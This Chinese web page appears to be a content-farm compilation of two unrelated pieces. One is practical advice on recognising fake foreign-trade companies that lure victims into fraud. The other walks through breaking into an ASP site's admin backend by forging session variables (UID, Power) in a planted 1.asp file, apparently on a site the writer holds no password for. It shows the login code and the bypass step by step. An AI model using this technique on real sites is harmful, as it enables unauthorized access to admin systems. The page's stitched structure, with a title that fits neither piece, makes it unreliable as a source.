session全教程

2024-09-27

session全教程（共3篇）

对付假外贸招数全教程篇1

所谓假外贸,就是国内的一些经济诈骗分子,打着某某外贸公司信息咨询公司的幌子,或利用在开放城市,边贸城市的便利,制造一些假求购信息,假合作意向,以此为诱饵,千方百计骗你过去,大则骗取几万几十万,小则骗吃骗喝,使不少初涉电子商务的中小企业疲于奔命,不但骗钱骗物,而且身心俱受到伤害,有的小厂甚至被这些骗子搞得倾家荡产,不少受害者谈起这些骗子无不切齿痛恨。

那么,如何对付这些外贸骗子呢?其实,万骗不离其宗,骗子总有它的规律可寻,只有了解了他们的共性的东西,才有可能识别他们,从而甄别真伪,不掉入陷阱。

一、区分那些是假外贸公司?

假外贸公司的最大特征就是:不管是什么外贸业务或多大的生意,一概叫你过去谈,虽然我们一直在常叮咛:凡叫是叫你过去签约的”外贸”公司大多是骗子公司,但可能也有真正的客户,如何去区分?比如,上个月,沈阳某乳品企业需要我公司的产品,叫我们过去谈,我们认为这是真正的客户,因为他们主要是配了解我公司产品的结构,特点,叫我们参观他们生产线的要求,所以,我们就毫不犹豫的过去了。因此,鉴定一个询价是否要过去,应该进行综合分析,才决定去还是不去。一般来说,符合以下特征的:100%是骗子公司,千万不能过去:

1、格式化的询价(是指事先印好询价格式,然后填上你的单位名称,需求的产品品名,漫天散发,广种薄收,引你上当;

2、不具体细问他要的产品的情况(如相关配套,款式,用途等),不关心你报的价格高低(或只是装腔作势随便问一下),而且数量巨大的;

3、对方要你的货,他不来看厂看货,反叫你去他处,并承诺可以预付定金,签定合同;

4、打着出口朝鲜,俄罗斯,蒙古的旗号,或者是和孟加拉,印度合作的幌子,千方百计骗你过去的;

二、如果被骗到骗子所在地怎么处理?

有很多理由,我们也许会被骗子骗到他们的所在地,因为有不少业务我们心中没底,会抱着去看看的心理,或许我们刚好顺便要去那个地方,于是,我们就会到骗子的地盘。

到了骗子的所在地怎么办?是被骗子牵着鼻子走,还是小心谨慎,观察这个公司的真伪,从而鉴别对方是否是骗子公司?

1、不要听从对方公司的指挥骗子公司往往会通过掌握你的行踪,安排你的起居,来实施他们的骗术。他们首先会以关心你的行程为幌子了解你的车次,航班,从而从容安排他们对你的诈骗过程;其次,他们会给你指定的宾馆,旅社,这是他们骗术的一部分,也是骗子收入的一部分,因为这些宾馆,旅社往往是和他们串通一气,最后,可以分些回扣,同时,在他们串通的宾馆,旅社里面,有些骗子会实施下三滥的套,比如栽赃陷害,抓嫖娼,赌博等。所以,凡骗子公司问你具体行程,请不要讲确切的时间和车次,可以给他们个突然袭击。对他们指定的宾馆饭店,千万不能去住,要反其道而行之,未接触之前就打乱骗子的阵脚,反被动为主动。

2、了解对方公司及周围的情况到了那边以后,先不要急着去这个公司,要先不露身份去了解一下这个公司的情况,一般通过询问附近的居民和店铺的人员,简接了解情况,还可以直接去公司周围,大致观察一下这个公司的情况,主要了解客户的进出情况,有否和客户争吵的现象,听一下周围群众对这个公司的评价,通过上述耳闻目睹,对这个公司基本有个轮廓,就可以凭你的经验进行分析和推断,然后再决定下一步的计划。

3、适当了解当地城市的一些情况再好了解当地政府官员的情况,特别是公安机关的情况,如公安局干部情况和地址,以便在交谈时给别人一个对这个城市很熟的感觉,这样的话,如果对方是骗子的话,就会对你有顾忌。

伪造Session登陆后台篇2

发现里面有个站程序还不错..可密码一直找不到..

看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk...

<%dim user_name,user_password,upwr,uID,ukey,cmd,rs

user_name=trim(request.form(“uid”))

user_password=trim(request.form(“pwd”))

user_password=jk_md5(user_password,“long”)

if user_name=“” or user_password=“” then

close_conn

response.redirect “../global/systeminfo.asp?flag=1”

end if

如果用户和密码为空就返回global/systeminfo.asp?flag=1这个页面提示“错误帐号或密码，请重新登陆”

在往下看代码

session(“UID”)=rs(“UserName”)

session(“power”)=rs(“Power”)

Session(“PSW”)=rs(“PSW”)

rs.close:set rs=Nothing

set cmd=Nothing

close_conn

response.redirect(“../system/default.asp”)

如果UID,,power.PSW不为空就返回system/default.asp登陆成功

checkuser.asp代码为

if session(“UID”)=“” then

response.redirect “../gobal/systeminfo.asp?flag=1”

response.end

end if

session(“UID”)为空同样返回gobal/systeminfo.asp?flag=1

那也就是说只要UID参数不为空就登陆成功

然后把以下代码保存为1.asp

session(“UID”)=“1”

Session(“Power”)=“1”

先访问1.asp..然后再访问后台system/default.asp..绕过了验证..看到了后台管理页面